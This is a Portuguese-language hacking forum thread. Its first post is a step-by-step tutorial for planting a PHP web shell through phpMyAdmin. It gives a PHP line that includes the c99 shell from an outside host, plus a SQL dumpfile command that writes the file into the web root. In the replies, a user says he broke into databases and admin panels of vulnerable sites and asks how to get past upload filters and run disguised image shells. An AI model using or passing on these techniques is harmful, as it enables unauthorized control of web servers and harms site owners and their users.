Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Upload Shell PHPMYADMIN

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Upload Shell PHPMYADMIN

    Vou ensinar como fazer o up da shell no phpmyadmin!

    Primeiro passo:

    1 - Criar uma database com qualquer nome.
    2 - Crie nessa db a table upshell com 1 field,esse field deve ser com valor 1 e em TEXT.
    3 - Após criar a table clique em INSERT e coloque o seguinte codigo:

    <?php if (!empty($_REQUEST['rilw0rm'])){ include 'http://sitecomsuac99.com.br/c99.txt';} ?>

    PS:a shell deve estar em txt.
    4 - Depois,do insert clique no menu SQL e insira o seguinte comando:

    select * into dumpfile 'C:/xampp/htdocs/shell.php' from upshell

    PS:C:/xampp/htdocs/form.php nem sempre é esse o caminho,para localizar o caminho correto devemos achar o phpinfo.php do phpmyadmin,se for xampp server ele fica no Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... depois ache a parte "DOCUMENT ROOT" fica bem no final.


    OK arquivo shell criado,para executa-lo é simples:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...




    Bom proveito!

  • Font Size
    #2
    Boa noite, rilw0rm, primeiramente obrigado.
    Eu estou com algumas dúvidas, já procurei pra caramba mas não consegui resposta para todas...
    É o seguinte: Consegui acesso a alguns DBs de uns sites vulneráveis, e através disso consegui acessar os respectivos paineis de admin... O problema é que não consegui upar shell em alguns deles, porque havia filtro no upload... então decidi seguir este tutorial seu... mas estou encontrando um problema na hora de executar esta query "select * into dumpfile 'C:/xampp/htdocs/shell.php' from upshell", e na hora de criar um db tbm, pois aparece-me um erro dizendo que não tenho permissões para isto. (Eu acessei os dbs por uma shell, aquele menu sql da shell, acessei pelo DBAcentral e também pelo SQL Manager. Porém em nenhum deles foi possível criar novos dbs ou executar a query.)
    Outra coisa, não achei a página phpmyadmin deles. Digitei assim: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar.... Poderia me explicar melhor como usar as dorks que você passou no outro tutorial?
    Também estava lendo o que um membro do forum postou sobre upar uma shell.php.gif, porém não sei como executar. Você tem alguma dica de como executar uma shell upada desta maneira?

    Desculpe-me pela quantidade de dúvidas, mas perguntei apenas o que não consegui encontrar.
    E Obrigado por suas contribuições para o forum .
    Abraço

    Comment


    • Font Size
      #3
      Só para dizer que em relação a upar como imagem, eu já tentei mt coisa, tentei uma shell em jpg, tentei os 2 tutos do 5ubzer0 (o do firefox e o da gif, porém no da gif, a gif parecia mt pequena para conter uma shell, creio eu que não fiz 100% correto, tentei todos os nomes de arquivo que estavam dentro da gif (
      muhacir.php, muh.php)). Não tenho mais ideia do que fazer...
      Não consegui editar a ultima mensagem, desculpem o flood.

      Quem puder me ajudar eu agradeço muito...

      Comment

      X
      Working...
      X